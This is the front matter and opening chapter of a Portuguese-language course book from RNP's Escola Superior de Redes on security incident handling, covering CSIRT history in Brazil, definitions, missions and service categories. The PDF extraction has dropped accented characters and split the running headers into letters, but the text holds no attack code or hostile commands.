Você está na página 1de 210

Tratamento

de Incidentes
de Segurana
Tratamento de
Incidentes de
Segurana

Tratamento de
Incidentes de
Segurana

Rio de Janeiro
Escola Superior de Redes
2015
Copyright 2015 Rede Nacional de Ensino e Pesquisa RNP
Rua Lauro Mller, 116 sala 1103
22290-906 Rio de Janeiro, RJ
Diretor Geral
Nelson Simes
Diretor de Servios e Solues
Jos Luiz Ribeiro Filho
Escola Superior de Redes
Coordenao
Luiz Coelho
Coordenao Acadmica de Segurana e Governana de TI
Edson Kowask
Edio
Lincoln da Mata
Reviso tcnica
Jcomo Picolini
Equipe ESR (em ordem alfabtica)
Adriana Pierro, Celia Maciel, Cristiane Oliveira, Derlina Miranda, Elimria Barbosa,
Evellyn Feitosa, Felipe Nascimento, Lourdes Soncin, Luciana Batista, Luiz Carlos Lobato,
Renato Duarte e Yve Abel Marcial.
Capa, projeto visual e diagramao
Tecnodesign
Verso
2.0.0
Este material didtico foi elaborado com fns educacionais. Solicitamos que qualquer erro encon-
trado ou dvida com relao ao material ou seu uso seja enviado para a equipe de elaborao de
contedo da Escola Superior de Redes, no e-mail info@esr.rnp.br. A Rede Nacional de Ensino e
Pesquisa e os autores no assumem qualquer responsabilidade por eventuais danos ou perdas, a
pessoas ou bens, originados do uso deste material.
As marcas registradas mencionadas neste material pertencem aos respectivos titulares.
Distribuio
Escola Superior de Redes
Rua Lauro Mller, 116 sala 1103
22290-906 Rio de Janeiro, RJ
http://esr.rnp.br
info@esr.rnp.br
Dados Internacionais de Catalogao na Publicao (CIP)
C416t Ceron, Joo
Tratamento de Incidentes de Segurana / Joo Ceron. Rio de Janeiro: RNP/ESR, 2014
208 p. : il. ; 27,5 cm.
ISBN 978-85-63630-46-9
1. Segurana de computador. 2. Internet medidas de segurana. 3. Centro de estudos,
Resposta e Tratamento de Incidentes de Segurana no Brasil (CERT). 4. Grupo de Resposta a
Incidentes de Segurana (CSIRT). I. Ttulo..
CDD 005.8
iii
Sumrio
Escola Superior de Redes
A metodologia da ESRix
Sobre o curso x
A quem se destinax
Convenes utilizadas neste livrox
Permisses de usoxi
Sobre o autorxii
1. Defnies e fundamentos de CSIRTs
Introduo1
Contextualizao histrica 2
Identifcando CSIRTs pelo mundo3
Defnio de CSIRT3
Exerccio de fxao 1 Conhecendo CSIRTs4
Abrangncia operacional e misso do CSIRT5
Servios de CSIRTs6
Aspectos operacionais de um CSIRT10
Tipos10
Modelos11
Autonomia 11
Defnio de incidente12
Passos para criao de um CSIRT13
Fruns de CSIRTS 13
iv
Roteiro de Atividades 115
Atividade 1.1 Criao de um CSIRT15
Atividade 1.2 Nome e sigla15
Atividade 1.3 Abrangncia operacional15
Atividade 1.4 Misso15
Atividade 1.5 Estrutura organizacional 15
Atividade 1.6 Servios 16
Atividade 1.7 Incidente de segurana 17
2. Gerenciamento do CSIRT
Introduo19
Cdigo de conduta19
Equipe21
Treinamento e desenvolvimento da equipe24
Terceirizao de servios 24
Contratao 25
Procedimentos de ingresso e desligamento27
Requisitos estruturais28
Comunicao 31
Fatores de sucesso 33
Roteiro de Atividades 237
Atividade 2.1 Entrevista coletiva37
Atividade 2.2 Contratao 37
Atividade 2.3 Desligamento 38
Atividade 2.4 Entrevista de emprego38
Atividade 2.5 Comunicando-se com a imprensa39
Atividade 2.6 Avaliao de incidente39
Atividade 2.7 Procedimentos40
Atividade 2.8 Gerenciamento de CSIRT40
3. Riscos e ameaas
Introduo41
Anlise de risco41
Ameaas associadas a segurana de sistemas 44
v
Comprometimento de sistemas45
Phishing46
Desfgurao47
Ataques de fora bruta47
Varredura em redes (Scan)48
Negao de servio (DoS e DDoS)48
Malwares50
Outros riscos53
APT54
Roteiro de Atividades 357
Atividade 3.1 Anlise de riscos 57
Atividade 3.2 Ameaas de segurana57
Atividade 3.3 Comprometimento de sistemas58
Atividade 3.4 Ataques web58
Atividade 3.5 Ataques de fora bruta59
Atividade 3.6 Atuando com APTs59
Atividade 3.7 Ataques de negao de servio (DoS)60
4. Processo de tratamento de incidentes
Introduo61
Metodologia para resposta a incidentes62
Preparao 63
Conteno 68
Erradicao70
Recuperao70
Avaliao72
Recursos adicionais 73
Roteiro para avaliao inicial de um incidente73
Procedimentos 74
Roteiro de atividades 477
Atividade 4.1 Notifcao de incidentes77
Atividade 4.2 Preparao77
Atividade 4.3 Deteco 78
Atividade 4.4 Conteno78
Atividade 4.5 Erradicao79
vi
Atividade 4.6 Recuperao 79
Atividade 4.7 Monitorao de acessos 79
5. Aspectos operacionais da resposta a incidentes
Introduo81
Aspectos operacionais da resposta a incidente81
Identifcao82
Mensagens de e-mail 83
Anlise de cabealho84
Atividade 5.1 Anlise de cabealho de e-mail87
Atividade 5.2 Utilizando o protocolo SMTP88
Sincronismo de tempo90
Atividade 5.3 Padronizao do formato data e hora92
Priorizao 93
Categorizao 94
Atividade 5.4 Classifcao e triagem de incidentes95
Atribuio 96
Escalao de incidentes 97
Notifcao de incidentes98
Boas prticas para a notifcao de incidentes de segurana103
Roteiro de atividades 5105
Atividade 5.1 Utilizando PGP105
Atividade 5.2 PGP Web-of-Trust106
Atividade 5.3 Notifcao de incidentes106
Atividade 5.4 Identifcar informaes relevantes em uma notifcao recebida106
6. Identifcao de contatos
Introduo109
Identifcao de contatos110
Traduzir domnios de redes para endereos IP (domnio > IP)110
Traduzir o endereo IP para domnios de redes (IP > domnio)111
Servio WHOIS111
National Internet Registry112
Domnios de rede113
Exerccio de fxao116
Endereamento IP116
vii
Exerccio de fxao118
Recursos adicionais119
Ferramentas119
Exerccio de fxao utilizando a ferramenta DIG122
Exerccio de fxao Sistemas Autnomos124
Roteiro de atividades 6129
Atividade 6.1 Dados sensveis129
Atividade 6.2 Investigao de incidentes129
Atividade 6.3 Investigao de contatos130
7. Anlise de Logs
Introduo131
Mensagens de logs132
Sistemas de logs135
Diversidade no formato dos logs137
Gerenciamento de logs139
Anlise de logs140
Filtragem143
Normalizao144
Correlao 145
Ferramentas para o processamento de logs147
Aspectos de segurana 149
Recomendaes para sistemas de logs150
Roteiro de atividades 7153
Atividade 7.1 Syslog153
Atividade 7.2 Infraestrutura de logs153
Atividade 7.3 Mensagens de logs154
Atividade 7.4 Sumarizao de logs156
Atividade 7.5 Anlise de logs157
8. Ferramentas para anlise de incidentes
Introduo159
Preocupaes de privacidade 160
Proxies 162
Web-Proxies 163
viii
Virtual Private Network (VPN)165
Rede Tor165
Uso da rede Tor na investigao de incidentes166
Mecanismos de busca167
Analisadores de malwares167
Assinaturas de malwares 168
Ferramentas multiantivrus169
Roteiro de atividades 8173
Atividade 8.1 Virustotal173
Anlise comportamental173
Atividade 8.2 Anlise dinmica de arquivos maliciosos177
Consideraes sobre o uso de ferramentas online178
Analisadores de websites178
Outros servios online 181
Listas de bloqueio 181
Atividade 8.3 Pesquisando por sites relacionados com fraudes182
Repositrio de websites desfgurados182
Atividade 8.4 Identifcar servidores que j foram comprometidos utilizando a base de
dados do zone-h183
Anlise de artefatos184
Atividade 8.5 Diferentes formas de ocultar o IP de origem184
Atividade 8.6 Privacidade185
Atividade 8.7 Uso de proxies185
Atividade 8.8 Deep Web186
9. Dinmica de tratamento de incidentes
Introduo189
Contextualizao189
SIFRA191
Tratamento de incidentes de segurana 192
Roteiro de atividades 9193
Atividade 9.1 Reunio193
ix
A Escola Superior de Redes (ESR) a unidade da Rede Nacional de Ensino e Pesquisa (RNP)
responsvel pela disseminao do conhecimento em Tecnologias da Informao e Comunica-
o (TIC). A ESR nasce com a proposta de ser a formadora e disseminadora de competncias
em TIC para o corpo tcnico-administrativo das universidades federais, escolas tcnicas e
unidades federais de pesquisa. Sua misso fundamental realizar a capacitao tcnica do
corpo funcional das organizaes usurias da RNP, para o exerccio de competncias aplic-
veis ao uso efcaz e efciente das TIC.
A ESR oferece dezenas de cursos distribudos nas reas temticas: Administrao e Projeto
de Redes, Administrao de Sistemas, Segurana, Mdias de Suporte Colaborao Digital e
Governana de TI.
A ESR tambm participa de diversos projetos de interesse pblico, como a elaborao e
execuo de planos de capacitao para formao de multiplicadores para projetos edu-
cacionais como: formao no uso da conferncia web para a Universidade Aberta do Brasil
(UAB), formao do suporte tcnico de laboratrios do Proinfo e criao de um conjunto de
cartilhas sobre redes sem fo para o programa Um Computador por Aluno (UCA).
A metodologia da ESR
A flosofa pedaggica e a metodologia que orientam os cursos da ESR so baseadas na
aprendizagem como construo do conhecimento por meio da resoluo de problemas tpi-
cos da realidade do profssional em formao. Os resultados obtidos nos cursos de natureza
terico-prtica so otimizados, pois o instrutor, auxiliado pelo material didtico, atua no
apenas como expositor de conceitos e informaes, mas principalmente como orientador do
aluno na execuo de atividades contextualizadas nas situaes do cotidiano profssional.
A aprendizagem entendida como a resposta do aluno ao desafo de situaes-problema
semelhantes s encontradas na prtica profssional, que so superadas por meio de anlise,
sntese, julgamento, pensamento crtico e construo de hipteses para a resoluo do pro-
blema, em abordagem orientada ao desenvolvimento de competncias.
Dessa forma, o instrutor tem participao ativa e dialgica como orientador do aluno para as
atividades em laboratrio. At mesmo a apresentao da teoria no incio da sesso de apren-
dizagem no considerada uma simples exposio de conceitos e informaes. O instrutor
busca incentivar a participao dos alunos continuamente.
Escola Superior de Redes
x
As sesses de aprendizagem onde se do a apresentao dos contedos e a realizao das
atividades prticas tm formato presencial e essencialmente prtico, utilizando tcnicas de
estudo dirigido individual, trabalho em equipe e prticas orientadas para o contexto de atua-
o do futuro especialista que se pretende formar.
As sesses de aprendizagem desenvolvem-se em trs etapas, com predominncia de tempo
para as atividades prticas, conforme descrio a seguir:
Primeira etapa: apresentao da teoria e esclarecimento de dvidas (de 60 a 90 minutos).
O instrutor apresenta, de maneira sinttica, os conceitos tericos correspondentes ao tema
da sesso de aprendizagem, com auxlio de slides em formato PowerPoint. O instrutor levanta
questes sobre o contedo dos slides em vez de apenas apresent-los, convidando a turma
refexo e participao. Isso evita que as apresentaes sejam montonas e que o aluno se
coloque em posio de passividade, o que reduziria a aprendizagem.
Segunda etapa: atividades prticas de aprendizagem (de 120 a 150 minutos).
Esta etapa a essncia dos cursos da ESR. A maioria das atividades dos cursos assncrona e
realizada em duplas de alunos, que acompanham o ritmo do roteiro de atividades proposto no
livro de apoio. Instrutor e monitor circulam entre as duplas para solucionar dvidas e oferecer
explicaes complementares.
Terceira etapa: discusso das atividades realizadas (30 minutos).
O instrutor comenta cada atividade, apresentando uma das solues possveis para resolv-la,
devendo ater-se quelas que geram maior difculdade e polmica. Os alunos so convidados a
comentar as solues encontradas e o instrutor retoma tpicos que tenham gerado dvidas,
estimulando a participao dos alunos. O instrutor sempre estimula os alunos a encontrarem
solues alternativas s sugeridas por ele e pelos colegas e, caso existam, a coment-las.
Sobre o curso
O curso apresenta os conceitos fundamentais e descreve as fases de tratamento de inciden-
tes de segurana com exerccios prticos e simulaes de casos. O curso apresenta ainda as
atividades necessrias para que seja estabelecida uma Equipe de Tratamento e Resposta a
Incidentes em Redes Computacionais ETIR, suas responsabilidades, seu modelo de atuao
e estrutura. Ao fnal do curso o aluno estar preparado para iniciar a criao de um grupo de
atendimento a incidentes de segurana (Computer Security Incident Response Team - CSIRT)
e com conhecimento necessrio para realizar o tratamento de incidentes na sua organizao.
A quem se destina
O curso destina-se aos gestores e profssionais da rea de segurana da informao e de TIC
que necessitam adquirir e desenvolver competncias e habilidades para iniciarem a rea de
Tratamento de Incidentes, implementarem e estabelecerem uma Equipe de Tratamento e
Resposta a Incidentes em Redes Computacionais ETIR de acordo com a norma complementar
do DSIC e as boas prticas de mercado. Tambm podero se benefciar outros profssionais
desejam adquirir o conhecimento sobre ETIR e tratamento de incidentes.
Convenes utilizadas neste livro
As seguintes convenes tipogrfcas so usadas neste livro:
Itlico
xi
Indica nomes de arquivos e referncias bibliogrfcas relacionadas ao longo do texto.
Largura constante

Indica comandos e suas opes, variveis e atributos, contedo de arquivos e resultado da sada
de comandos. Comandos que sero digitados pelo usurio so grifados em negrito e possuem
o prefxo do ambiente em uso (no Linux normalmente # ou $, enquanto no Windows C:\).
Contedo de slide q
Indica o contedo dos slides referentes ao curso apresentados em sala de aula.
Smbolo w
Indica referncia complementar disponvel em site ou pgina na internet.
Smbolo d
Indica um documento como referncia complementar.
Smbolo v
Indica um vdeo como referncia complementar.
Smbolo s
Indica um arquivo de adio como referncia complementar.
Smbolo !
Indica um aviso ou precauo a ser considerada.
Smbolo p
Indica questionamentos que estimulam a refexo ou apresenta contedo de apoio ao
entendimento do tema em questo.
Smbolo l
Indica notas e informaes complementares como dicas, sugestes de leitura adicional ou
mesmo uma observao.
Permisses de uso
Todos os direitos reservados RNP.
Agradecemos sempre citar esta fonte quando incluir parte deste livro em outra obra.
Exemplo de citao: TORRES, Pedro et al. Administrao de Sistemas Linux: Redes e Segurana.
Rio de Janeiro: Escola Superior de Redes, RNP, 2013.
Comentrios e perguntas
Para enviar comentrios e perguntas sobre esta publicao:
Escola Superior de Redes RNP
Endereo: Av. Lauro Mller 116 sala 1103 Botafogo
Rio de Janeiro RJ 22290-906
E-mail: info@esr.rnp.br
xii
Sobre o autor
Jcomo Picolini formado em Engenharia pela Universidade Federal de So Carlos, com
ps-graduaes no Instituto de Computao e Instituto de Economia da UNICAMP, possui
17 anos de experincia na rea de segurana, trabalhou no CAIS/RNP at 2009 e depois
como Coordenador Acadmico da rea de Segurana e Governana de TI ESR/RNP at
2011, Diretor no Dragon Research Group, membro da diretoria do captulo da ISACA de
Braslia 2011-2014, membro da Comisso de Direito Eletrnico e Crimes de Alta Tecnologia
da OAB SP, liasion do FIRST.org onde coordena as atividades de treinamento, professor
convidado em cursos de ps-graduao nas disciplinas de anlise forense, tratamento de
incidentes, segurana de sistemas, criao e gerenciamento de CSIRTs. Atualmente trabalha
na empresa Team Cymru NFP e faz parte da equipe que prov informaes para tornar a
Internet mais segura.
Edson Kowask Bezerra profssional da rea de segurana da informao e governana
h mais de quinze anos, atuando como auditor lder, pesquisador, gerente de projeto e
gerente tcnico, em inmeros projetos de gesto de riscos, gesto de segurana da informa-
o, continuidade de negcios, PCI, auditoria e recuperao de desastres em empresas de
grande porte do setor de telecomunicaes, fnanceiro, energia, indstria e governo. Com
vasta experincia nos temas de segurana e governana, tem atuado tambm como pales-
trante nos principais eventos do Brasil e ainda como instrutor de treinamentos focados em
segurana e governana. professor e coordenador de cursos de ps-graduao na rea de
segurana da informao, gesto integrada, de inovao e tecnologias web. Hoje atua como
Coordenador Acadmico de Segurana e Governana de TI da Escola Superior de Redes.
1

C
a
p

t
u
l
o


1

-

D
e
f
n
i

e
s

e

f
u
n
d
a
m
e
n
t
o
s


d
e

C
S
I
R
T
s
o
b
j
e
t
i
v
o
s
c
o
n
c
e
i
t
o
s
1
Definies e fundamentos
de CSIRTs
Aprender conceitos e termos mais importantes de um CSIRT; Descrever os principais
aspectos operacionais de um CSIRT; Iniciar o processo de criao de um CSIRT.

O CSIRT; Defnies importantes na criao de um CSIRT (Computer Security
Incident Response Team ou Grupo de Resposta a Incidentes de Segurana, na sigla
em ingls); Conceito de incidente de segurana.


Introduo
q O contnuo crescimento e a popularizao da internet esto sendo acompanhados pelo
aumento de novas ameaas de segurana dos sistemas computacionais. Com o passar
do tempo, entretanto, as ameaas e ataques aos sistemas computacionais tm aumen-
tado consideravelmente. Esse aumento decorrente de inmeros fatores, entre os quais
o aumento no nmero de usurios, o aumento no nmero de transaes fnanceiras e,
sobretudo, o aumento do grau de dependncia tecnolgica da sociedade.
Boa parte dos servios est amplamente acessvel na rede, de modo a prover suas funciona-
lidades aos seus usurios. Consequentemente, esses sistemas tambm se tornam expostos
aos diferentes tipos de ameaas. Tais ameaas incluem atividades de usurios, softwares
maliciosos e vulnerabilidades associadas aos servios utilizados. Diante disso, torna-se
essencial implementar mecanismos para lidar com eventos de segurana antes mesmo
que danos signifcativos sejam causados s instituies. Alm do mais, necessrio que os
procedimentos tradicionais para proteo de sistemas sejam constantemente aprimorados
de modo a contemplar as novas ameaas e ataques emergentes na internet.
q Esse contexto fomentou o surgimento de equipes especializadas em lidar com incidentes
de segurana. Dessa forma, a equipe pode desenvolver metodologias para proteger os
sistemas e, na ocorrncia de um avento arbitrrio de segurana, esse grupo de pessoas
pode prontamente interceder de forma efetiva.
2

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Contextualizao histrica
q Atualmente observam-se muitos times de segurana constitudos em diferentes insti-
tuies. Nos primrdios da internet, o nmero de incidentes de segurana era bastante
reduzido e de baixa complexidade. No entanto, com o passar do tempo, os incidentes
de segurana obtiveram novas propores, sobretudo aps o incidente de segurana
denominado de Internet Worm.
Esse incidente fomentou a discusso na comunidade de segurana pela necessidade de
melhores meios para identifcar e responder incidentes de computadores na internet de
forma efetiva.
q Como resultado, um conjunto de recomendaes foi especifcado tendo como
principal demanda:
1 Criar um nico ponto de contato na rede para comunicar problemas de segurana;
1 Atuar de forma confvel com informaes de segurana.
Em resposta a essas recomendaes, foi institucionalizado o primeiro grupo de resposta
a incidentes, conhecido como CERT Coordination Center (CERT/CC), localizado na univer-
sidade de Carnegie Mellon, nos Estados Unidos.
Na Europa, o mesmo modelo foi adotado, e em 1992 o provedor acadmico holands SURFnet
fundou o primeiro time europeu, o qual foi denominado SURFnet-CERT. Consequentemente,
outros times foram implementados em diferentes intuies e em diversos pases.
q No Brasil no foi diferente. Embora a primeira conexo da internet tenha sido ofcial-
mente inaugurada em 1989, a internet realmente ganhou corpo em 1995, quando foi
liberada a operao da internet comercial no Brasil. No mesmo ano, o Comit Gestor
da Internet no Brasil (CGI.br) foi criado com a responsabilidade de coordenar e integrar
todas as iniciativas de servios internet no pas, promovendo a qualidade tcnica, a ino-
vao e a disseminao dos servios ofertados.
Entre as diversas iniciativas do CGI.br, a publicao do documento Rumo Criao de
uma Coordenadoria de Segurana de Redes na Internet Brasil em agosto de 1996 foi um
marco para a segurana da internet brasileira.
Nesse documento, so discutidos aspectos de segurana nacional e a importncia dos
CSIRTs para a segurana da rede. Entre as recomendaes, sugeriu-se a criao de um
centro nacional de coordenao de segurana de redes.
q Com base nas recomendaes do CGI.br, em junho de 1997 foi estabelecido o primeiro
grupo de responsabilidade nacional, denominado NIC BR Security Ofce (NBSO), que
posteriormente seria renomeado para CERT.br.
No mesmo ano, outros times de diferentes instituies brasileiras foram formalizados:
q 1 1997:
2 Fundao do CAIS: CSIRT da prpria Rede Nacional de Ensino e Pesquisa (RNP);
2 Fundao do NBSO (Cert.br);
2 Fundao do CERT-RS: CSIRT da rede acadmica do Rio Grande do Sul.
1 1999:
2 Fundao do GRA: CSIRT do SERPRO (Servio Federal de Processamento de Dados);
2 Fundao de diversos CSIRTs em universidades e operadores de telecomunicaes.
Internet Worm:
Em 1988, o incidente
Internet Worm deixou
milhares de compu-
tadores inoperantes.
Estima-se que seis
mil sistemas foram
afetados, o que repre-
sentava aproximada-
mente 10% da internet
operante na poca.
3

C
a
p

t
u
l
o


1

-

D
e
f
n
i

e
s

e

f
u
n
d
a
m
e
n
t
o
s


d
e

C
S
I
R
T
s
q 1 2004:
2 Fundao do CTIR Gov: CSIRT voltado para a administrao pblica federal.
1 2010:
2 Fundao do CDCiber: CSIRT responsvel pelo setor ciberntico no exrcito.
No Brasil, atualmente, podemos encontrar diversos grupos estabelecidos em diferentes
estados. No website do CERT.br so ilustrados alguns times estabelecidos e respectivas
informaes de contato.
Identificando CSIRTs pelo mundo
Os websites a seguir podem ser utilizados para localizar CSIRTs e suas respectivas abrangncias
operacionais nos mais diversos pases.
1 http://www.frst.org/members/teams
1 http://www.rnp.br/cais/csirts.html
1 http://www.cert.br/contato-br.html
1 http://www.cert.org/csirts/national/contact.html
1 http://www.apcert.org/about/structure/members.html
1 http://www.cert.org/csirts/csirt-map.html
Definio de CSIRT
q Um Computer Security Incident Response Team (CSIRT) ou um Computer Security Inci-
dent Response Team (CSIRT) em portugus, Grupo de Resposta a Incidentes de Segu-
rana uma organizao que responde a incidentes de segurana provendo suporte
necessrio para resolver ou auxiliar na resoluo.
O CSIRT normalmente presta servios para uma comunidade bem defnida, que pode ser a
entidade que o mantm, tal como empresa, rgo governamental ou organizao acadmica.
Independentemente de sua atuao, fundamental que um CSIRT tenha a habilidade de ana-
lisar e prover rapidamente meios efetivos para tratar um incidente. A rpida identifcao e
a efetiva anlise de um incidente de segurana podem diminuir possveis danos e, em ltima
anlise, diminuir os eventuais custos de uma recuperao. Como consequncia, a anlise de
incidentes permite a implementao de medidas preventivas evitando que eventos similares
aconteam novamente.
q Existe uma sutil diferena entre um CSIRT e uma equipe de segurana departamental.
Uma equipe de segurana departamental desenvolve aes habituais relativas moni-
torao de redes e sistemas, como por exemplo: atualizao de sistemas; confgurao
de fltro de pacotes; anlise de logs; gerenciamento de redes e outras tarefas. J um
CSIRT atua com foco na resposta de incidentes, implementando um ponto central para
notifcao, anlise e coordenao de incidentes na organizao. De forma comple-
mentar, um CISRT pode complementar suas atividades incorporando tarefas de uma
equipe de segurana departamental; entretanto, seu foco deve estar no tratamento de
incidentes de segurana.
Organizaes que implementam CSIRTs valem-se dos seguintes benefcios:
1 Existncia de mecanismos de resposta a incidentes de segurana;
1 Instituio preparada para as ameaas emergentes;
4

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Aumento do grau de segurana, ao desenvolver uma cultura de segurana;
1 Criao de mecanismos que visam preservao da instituio;
1 Introduo de senso crtico em relao viso tradicional de TI.
comum questionar-se em relao denominao de grupos a resposta a incidentes. Alm
de CSIRT, outras siglas so rotineiramente empregadas para designar grupos de resposta a
incidentes de segurana. Talvez as siglas mais utilizadas sejam: CERT e ETIR.
A identidade de um grupo comea pela defnio do seu nome.
q O nome e a sigla permitem ao seu CSIRT criar uma identidade prpria, que deve estar
alinhada com a de sua instituio e, se possvel, refetir o setor que representa (banco,
indstria, governo etc.).
A seguir uma listagem de siglas e nomes de alguns times:
1 CERT/CC: Computer Emergency Response Team/Coordination Center;
1 CAIS/RNP: Centro de Atendimento a Incidentes de Segurana da Rede Nacional de
Ensino e Pesquisa;
1 CENATIS: Centro de Atendimento e Tratamento de Incidentes de Segurana da
Universidade Federal do Rio de Janeiro (UFRJ);
1 CERT.BR: Centro de Estudo, Resposta e Tratamento de Incidentes de Segurana
no Brasil;
1 NARIS: Ncleo de Atendimento e Resposta a Incidentes de Segurana da Universi-
dade Federal do Rio Grande do Norte (UFRN);
1 GRIS-CD: Grupo de Resposta a Incidentes de Segurana da Cmara dos Deputados;
1 TRI: Time de Resposta a Incidentes da Universidade Federal do Rio Grande do Sul
(UFRGS);
1 CERT-RS: Centro de Emergncias em Segurana da Rede Tch;
1 USP/CSIRT: Centro de Resposta a Incidentes de Segurana da Universidade de So
Paulo (USP);
1 GRA/SERPRO: Grupo de Resposta a Ataques do Servio Federal de Processamento de
Dados (SERPRO).
Exerccio de fixao 1 e
Conhecendo CSIRTs
Atravs de uma consulta na internet, localize dois exemplos de grupos de resposta a
incidentes de segurana nas reas listadas a seguir. Escreva a sigla, o nome do grupo e a
comunidade de atuao.
CSIRT governamental:
1.
2.

A sigla CERT (Computer
Emergency Response
Team) uma marca
patenteada e somente
pode ser usada
mediante prvia
autorizao. J a sigla
ETIR representa Equipe
de Tratamento e
Resposta a Incidentes
em redes de computa-
dores, o que corres-
ponde a uma traduo
livre do termo CSIRT.
l
Leitura recomendada
defnio de CSIRTs
segundo o CERT/CC:
http://www.cert.org/
csirts/csirt_faq.html e
http://www.cert.br/
certcc/csirts/csirt_
faq-br.html e Departa-
mento de Segurana da
Informao e Comuni-
caes: http://dsic.
planalto.gov.br/
d
5

C
a
p

t
u
l
o


1

-

D
e
f
n
i

e
s

e

f
u
n
d
a
m
e
n
t
o
s


d
e

C
S
I
R
T
s
CSIRT de instituio fnanceira:
1.
2.

CSIRT comercial:
1.
2.

CSIRT acadmico:
1.
2.

Abrangncia operacional e misso do CSIRT
q A abrangncia operacional, tambm conhecida por constituency, defne a comunidade
atendida pelos servios do CSIRT. A abrangncia operacional de um CSIRT pode ser
composta por diversos domnios administrativos, diferentes redes, ou ainda por um
conjunto especfco de domnios. Por exemplo: O CSIRT exemplo atende domnios e
endereos IP alocados para o AS XXXX; ou ainda, de forma mais fexvel: Redes, ende-
reos IP e domnios atendidos pela instituio.
Com a defnio da abrangncia operacional torna-se possvel mapear as necessidades
e anseios da comunidade utilizadora, o que possibilita, em um contexto mais amplo,
defnir a misso do CSIRT.
A misso de um CSIRT deve fornecer uma breve descrio das metas e objetivos da
equipe. A defnio da misso que permite determinar o conjunto de atividades a
serem desenvolvidas pela equipe no contexto de sua abrangncia operacional.
Recomenda-se que a misso de um CSIRT seja concisa e clara. Afnal, de certa forma, a misso de
um CSIRT permite que entidades externas possam defnir expectativas apropriadas em relao
s aes a serem tomadas pela equipe. Alguns exemplos de defnies da misso de CSIRT:
q 1 Misso do CAIS/RNP (http://www.rnp.br/cais/): O CAIS Centro de Atendimento a
Incidentes de Segurana atua na deteco, resoluo e preveno de incidentes de
segurana na rede acadmica brasileira, alm de elaborar, promover e disseminar
prticas de segurana em redes.
6

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Misso do CERT.br (http://www.cert.br/missao.html): O CERT.br, anteriormente
denominado NBSO/Brazilian CERT, o Grupo de Resposta a Incidentes de Segurana
para a Internet brasileira, mantido pelo Comit Gestor da Internet no Brasil. o grupo
responsvel por receber, analisar e responder a incidentes de segurana em compu-
tadores, envolvendo redes conectadas internet brasileira.
1 Misso do CTIR.gov (http://www.ctir.gov.br/): Operar e manter o Centro de Trata-
mento de Incidentes de Segurana de Redes de Computadores da Administrao
Pblica Federal.
De fato, a misso posiciona o CSIRT frente sua comunidade de atuao. Adicionalmente, a
sua comunidade toma conhecimento dos servios prestados pelo time de segurana. Sabe-
se, entretanto, que o relacionamento com a comunidade de atuao deve ir alm da simples
defnio e divulgao dos servios prestados pelo time. Nesse contexto de segurana, mais
do que nunca, aes falam mais alto do que defnies escritas. Um CSIRT leva tempo para
ter o seu reconhecimento na comunidade de atuao. Fatores como confana e respeito so
conquistados naturalmente com bom trabalho realizado.
Por fm, e no menos importante, assegurar que a misso do CSRIT tenha apoio e suporte
da camada de gesto da instituio (diretores ou equivalentes). Do contrrio, a atuao do
time pode ser seriamente comprometida.
Servios de CSIRTs
q Os servios de um CSIRT defnem um conjunto de atividades que sero providas para
a sua comunidade de atuao (constituency). Evidentemente, algumas atividades so
intrnsecas ao processo de tratamento de incidentes e, portanto, mandatrias a todos
os CSIRTs: anlise de eventos, resposta de incidentes e coordenao para resoluo de
incidentes de computadores.
Tipicamente, os CSIRTs tradicionais implementam um conjunto de servios adicionais que
complementam as atividades relativas ao processo de resposta a incidente, tal como a
elaborao de alertas e anncios relacionados segurana. Outros CSIRTs, porm, diversi-
fcam a sua base de servios provendo atividades de auditoria de sistemas, anlise de riscos,
treinamento e anlise forense.
q Algumas atividades tpicas de CSIRTs:
1 Anlise de artefatos maliciosos;
1 Anlise de vulnerabilidades;
1 Emisso de alertas e advertncias;
1 Prospeco ou monitorao de novas tecnologias;
1 Avaliao de segurana;
1 Desenvolvimento de ferramentas de segurana;
1 Deteco de intruso;
1 Disseminao de informaes relacionadas segurana.
Embora no exista um conjunto padro de servios que um CSIRT deva oferecer,
essencial que cada time de segurana especifque servios tendo em vista seus recursos
disponveis, tal como equipe, expertise e infraestrutura necessria.
Segundo documen-
tao do prprio CERT/
CC, em mdia, um
CSIRT leva em torno de
um ano aps o incio
de sua operao para
que a comunidade
assimile o time e
comece um processo
regular de notifcaes.
O aumento de
notifcaes de
segurana para um
CSIRT um indcio de
acolhimento pela
comunidade de
abrangncia.
l
7

C
a
p

t
u
l
o


1

-

D
e
f
n
i

e
s

e

f
u
n
d
a
m
e
n
t
o
s


d
e

C
S
I
R
T
s
O CERT/CC, por sua vez, disponibiliza um repositrio de boas prticas e recomendaes que
especifcam detalhes dos servios prestados por um CSIRT.
q Segundo a nomenclatura adotada, os servios de um CSIRT podem ser agrupados em:
1 Servios reativos;
1 Servios proativos;
1 Servios de qualidade.
Os servios correspondentes a cada categoria so listados na tabela 1.1 e descritos de
forma mais detalhada na sequncia.
Reativos Proativos Qualidade
1Anlise de Vulnerabili-
dades.
1Elaborao de alertas e
avisos.
1Gerenciamento de
vulnerabilidades.
1Anlise de malwares e
demais artefatos.
1Monitorao da segu-
rana na rede.
1Alertas de ferramentas.
1Avaliao situacional.
1Deteco de intruso.
1Desenvolvimento de fer-
ramentas de segurana.
1Anlise de processos e
procedimentos.
1Gerenciamento da
equipe ou negcios.
1Plano de recuperao de
desastres.
1Educao e treinamento.
Servios reativos
q So servios instanciados aps a identifcao de um incidente de segurana. Tais ser-
vios visam solucionar um incidente de segurana em execuo ou prover meios para a
investigao de incidentes previamente identifcados.
De todo modo, os servios reativos fazem parte das atividades essenciais implemen-
tadas por CSIRTs no processo de resposta a incidentes de segurana. Os servios podem
ser instanciados por uma notifcao de um incidente mquina comprometida, por
exemplo um pedido de ajuda ou, ainda, por ferramentas de deteco do prprio time
de segurana.
Servios proativos
q Os servios proativos tm por objetivo evitar que incidentes de segurana ocorram e,
tambm, reduzir o impacto quando estes ocorrerem. Para isso, buscam-se desenvolver
aes seguras de maneira a aprimorar a segurana dos sistemas como um todo, bus-
cando diminuir o potencial de sucesso dos ataques contra a infraestrutura das organiza-
es. Alguns servios dessa categoria esto diretamente relacionados a:
1 Implementar defesa em camadas e garantir que as melhores prticas de segurana
sejam implementadas nos sistemas computacionais, incluindo a confgurao, def-
nio e implementao;
